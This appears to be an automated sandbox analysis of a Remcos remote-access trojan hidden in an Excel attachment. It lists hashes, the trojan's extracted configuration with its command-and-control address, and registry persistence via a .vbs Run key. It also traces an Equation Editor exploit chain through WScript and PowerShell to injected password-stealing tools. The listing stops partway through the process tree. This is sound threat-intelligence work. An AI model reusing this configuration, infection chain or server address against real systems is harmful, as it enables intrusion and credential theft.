remcos | 0106667b89dd36d8867f97ad28e16e1b7cfbbea87fb3ca0fe721d133b927b193

Analysis

max time kernel
149s
max time network
140s
platform
windows7_x64
resource
win7-20240220-en
resource tags

arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
submitted
20-03-2024 11:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

RFQ-000753.xls
Size

61KB
MD5

0fa600f75bbb287974636e8538e76042
SHA1

adbb2d02610d13028366283a5f006a24a8b44f16
SHA256

0106667b89dd36d8867f97ad28e16e1b7cfbbea87fb3ca0fe721d133b927b193
SHA512

868c8e28f63c41c9b3e297191471fae681289f814f7ebab4e33c0bbf02d76d705a43d067769090fb4f0ef27f5d84366ea60c4004e6878245d5957e9bc21104a5
SSDEEP

768:UyBP0/+sG1tzXyBP0nApAEhJrOawVkC43+1eaIqnxMsijgO4E9XFzd:U68/pG1tzX68ApAEzrOawaaZus04E9

Score

10^/10

remcos remotehost collection persistence rat spyware stealer

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

107.172.31.178:2404

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-NVSJ5U
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

NirSoft MailPassView 3 IoCs

Password recovery tool for various email clients

Processes:

resource	yara_rule
behavioral1/memory/556-298-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView
behavioral1/memory/556-293-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView
behavioral1/memory/556-317-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 3 IoCs

Password recovery tool for various web browsers

Processes:

resource	yara_rule
behavioral1/memory/488-295-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView
behavioral1/memory/488-294-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView
behavioral1/memory/488-309-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Nirsoft 9 IoCs

Processes:

resource	yara_rule
behavioral1/memory/488-295-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral1/memory/556-298-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral1/memory/488-294-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral1/memory/556-293-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral1/memory/1412-301-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral1/memory/1412-303-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral1/memory/1412-304-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral1/memory/488-309-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral1/memory/556-317-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft

Blocklisted process makes network request 7 IoCs

Processes:

EQNEDT32.EXEWScript.exepowershell.exe

flow pid process

13 2284 EQNEDT32.EXE
18 2304 WScript.exe
20 2304 WScript.exe
22 1284 powershell.exe
24 1284 powershell.exe
26 1284 powershell.exe
27 1284 powershell.exe
Abuses OpenXML format to download file from external location
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

flow	pid	process
13	2284	EQNEDT32.EXE
18	2304	WScript.exe
20	2304	WScript.exe
22	1284	powershell.exe
24	1284	powershell.exe
26	1284	powershell.exe
27	1284	powershell.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

Processes:

RegAsm.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	RegAsm.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Windows\CurrentVersion\Run\Path = "C:\\ProgramData\\RMB.vbs"	powershell.exe

Drops file in System32 directory 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

powershell.exeRegAsm.exe

description	pid	process	target process
PID 1284 set thread context of 1552	1284	powershell.exe	RegAsm.exe
PID 1552 set thread context of 488	1552	RegAsm.exe	RegAsm.exe
PID 1552 set thread context of 556	1552	RegAsm.exe	RegAsm.exe
PID 1552 set thread context of 1412	1552	RegAsm.exe	RegAsm.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Office loads VBA resources, possible macro or embedded object present
Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry
T1012

System Information Discovery
T1082

Processes:

EXCEL.EXE

description ioc process

Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
exploit

Exploitation for Client Execution
T1203

Processes:

EQNEDT32.EXE

pid process

2284 EQNEDT32.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

pid	process
2284	EQNEDT32.EXE

Modifies Internet Explorer settings 1 TTPs 31 IoCs

adware spyware

Modify Registry

T1112

Processes:

EXCEL.EXEWINWORD.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Toolbar	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MenuExt	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE

Modifies registry class 64 IoCs

Processes:

WINWORD.EXE

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\ = "&Print"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\ = "&Edit"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

3032 EXCEL.EXE
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exeRegAsm.exe

pid process

2764 powershell.exe
1284 powershell.exe
2496 powershell.exe
488 RegAsm.exe
488 RegAsm.exe
Suspicious behavior: MapViewOfSection 3 IoCs

Processes:

RegAsm.exe

pid process

1552 RegAsm.exe
1552 RegAsm.exe
1552 RegAsm.exe

pid	process
3032	EXCEL.EXE

pid	process
2764	powershell.exe
1284	powershell.exe
2496	powershell.exe
488	RegAsm.exe
488	RegAsm.exe

pid	process
1552	RegAsm.exe
1552	RegAsm.exe
1552	RegAsm.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exeRegAsm.exe

description	pid	process
Token: SeDebugPrivilege	2764	powershell.exe
Token: SeDebugPrivilege	1284	powershell.exe
Token: SeDebugPrivilege	2496	powershell.exe
Token: SeDebugPrivilege	1412	RegAsm.exe

Suspicious use of SetWindowsHookEx 5 IoCs

Processes:

EXCEL.EXEWINWORD.EXE

pid process

3032 EXCEL.EXE
3032 EXCEL.EXE
3032 EXCEL.EXE
2620 WINWORD.EXE
2620 WINWORD.EXE

pid	process
3032	EXCEL.EXE
3032	EXCEL.EXE
3032	EXCEL.EXE
2620	WINWORD.EXE
2620	WINWORD.EXE

Suspicious use of WriteProcessMemory 60 IoCs

Processes:

EQNEDT32.EXEWINWORD.EXEWScript.exepowershell.exepowershell.exeRegAsm.exe

description	pid	process	target process
PID 2284 wrote to memory of 2304	2284	EQNEDT32.EXE	WScript.exe
PID 2284 wrote to memory of 2304	2284	EQNEDT32.EXE	WScript.exe
PID 2284 wrote to memory of 2304	2284	EQNEDT32.EXE	WScript.exe
PID 2284 wrote to memory of 2304	2284	EQNEDT32.EXE	WScript.exe
PID 2620 wrote to memory of 540	2620	WINWORD.EXE	splwow64.exe
PID 2620 wrote to memory of 540	2620	WINWORD.EXE	splwow64.exe
PID 2620 wrote to memory of 540	2620	WINWORD.EXE	splwow64.exe
PID 2620 wrote to memory of 540	2620	WINWORD.EXE	splwow64.exe
PID 2304 wrote to memory of 2764	2304	WScript.exe	powershell.exe
PID 2304 wrote to memory of 2764	2304	WScript.exe	powershell.exe
PID 2304 wrote to memory of 2764	2304	WScript.exe	powershell.exe
PID 2304 wrote to memory of 2764	2304	WScript.exe	powershell.exe
PID 2764 wrote to memory of 1284	2764	powershell.exe	powershell.exe
PID 2764 wrote to memory of 1284	2764	powershell.exe	powershell.exe
PID 2764 wrote to memory of 1284	2764	powershell.exe	powershell.exe
PID 2764 wrote to memory of 1284	2764	powershell.exe	powershell.exe
PID 1284 wrote to memory of 2496	1284	powershell.exe	powershell.exe
PID 1284 wrote to memory of 2496	1284	powershell.exe	powershell.exe
PID 1284 wrote to memory of 2496	1284	powershell.exe	powershell.exe
PID 1284 wrote to memory of 2496	1284	powershell.exe	powershell.exe
PID 1284 wrote to memory of 1552	1284	powershell.exe	RegAsm.exe
PID 1284 wrote to memory of 1552	1284	powershell.exe	RegAsm.exe
PID 1284 wrote to memory of 1552	1284	powershell.exe	RegAsm.exe
PID 1284 wrote to memory of 1552	1284	powershell.exe	RegAsm.exe
PID 1284 wrote to memory of 1552	1284	powershell.exe	RegAsm.exe
PID 1284 wrote to memory of 1552	1284	powershell.exe	RegAsm.exe
PID 1284 wrote to memory of 1552	1284	powershell.exe	RegAsm.exe
PID 1284 wrote to memory of 1552	1284	powershell.exe	RegAsm.exe
PID 1284 wrote to memory of 1552	1284	powershell.exe	RegAsm.exe
PID 1284 wrote to memory of 1552	1284	powershell.exe	RegAsm.exe
PID 1284 wrote to memory of 1552	1284	powershell.exe	RegAsm.exe
PID 1284 wrote to memory of 1552	1284	powershell.exe	RegAsm.exe
PID 1284 wrote to memory of 1552	1284	powershell.exe	RegAsm.exe
PID 1284 wrote to memory of 1552	1284	powershell.exe	RegAsm.exe
PID 1284 wrote to memory of 1552	1284	powershell.exe	RegAsm.exe
PID 1284 wrote to memory of 1552	1284	powershell.exe	RegAsm.exe
PID 1552 wrote to memory of 488	1552	RegAsm.exe	RegAsm.exe
PID 1552 wrote to memory of 488	1552	RegAsm.exe	RegAsm.exe
PID 1552 wrote to memory of 488	1552	RegAsm.exe	RegAsm.exe
PID 1552 wrote to memory of 488	1552	RegAsm.exe	RegAsm.exe
PID 1552 wrote to memory of 488	1552	RegAsm.exe	RegAsm.exe
PID 1552 wrote to memory of 488	1552	RegAsm.exe	RegAsm.exe
PID 1552 wrote to memory of 488	1552	RegAsm.exe	RegAsm.exe
PID 1552 wrote to memory of 488	1552	RegAsm.exe	RegAsm.exe
PID 1552 wrote to memory of 556	1552	RegAsm.exe	RegAsm.exe
PID 1552 wrote to memory of 556	1552	RegAsm.exe	RegAsm.exe
PID 1552 wrote to memory of 556	1552	RegAsm.exe	RegAsm.exe
PID 1552 wrote to memory of 556	1552	RegAsm.exe	RegAsm.exe
PID 1552 wrote to memory of 556	1552	RegAsm.exe	RegAsm.exe
PID 1552 wrote to memory of 556	1552	RegAsm.exe	RegAsm.exe
PID 1552 wrote to memory of 556	1552	RegAsm.exe	RegAsm.exe
PID 1552 wrote to memory of 556	1552	RegAsm.exe	RegAsm.exe
PID 1552 wrote to memory of 1412	1552	RegAsm.exe	RegAsm.exe
PID 1552 wrote to memory of 1412	1552	RegAsm.exe	RegAsm.exe
PID 1552 wrote to memory of 1412	1552	RegAsm.exe	RegAsm.exe
PID 1552 wrote to memory of 1412	1552	RegAsm.exe	RegAsm.exe
PID 1552 wrote to memory of 1412	1552	RegAsm.exe	RegAsm.exe
PID 1552 wrote to memory of 1412	1552	RegAsm.exe	RegAsm.exe
PID 1552 wrote to memory of 1412	1552	RegAsm.exe	RegAsm.exe
PID 1552 wrote to memory of 1412	1552	RegAsm.exe	RegAsm.exe

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\RFQ-000753.xls
1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:3032

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" -Embedding
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2620

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
2⤵
PID:540

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Blocklisted process makes network request
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:2284

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\imaginepixelmediakiss.vbs"
2⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2304

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
